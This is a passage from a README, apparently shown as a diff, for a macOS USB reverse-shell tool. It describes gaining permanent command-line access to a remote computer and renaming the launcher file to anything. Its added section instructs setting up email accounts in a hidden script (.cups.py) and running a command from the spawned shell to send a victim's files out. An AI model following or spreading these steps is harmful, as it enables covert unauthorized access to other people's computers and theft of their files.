max-quirk/usb_reverse_shell_OSX/README.txt

 7. You have permanent access to the remote computer, can control it via the command line

 NOTE: File "Click to spawn RS" can be renamed to whatever you like.

+EMAIL FILES TO YOURSELF:
+1. To email any file to yourself, you must set up two email accounts, one to send the file (sending email) and one to receive the file (receiving email).
+Edit the cups.py file inside the .msf folder and input a receiving and sending email address, as well as the password for the sending email.

+2. To send a file to yourself once reverse shell is spawned and a connection has been made, enter the home directory (type "cd") and then enter "python .cups.py PATH_TO FILE" e.g. "python .cups.py ~/Desktop/funnyPic.jpg"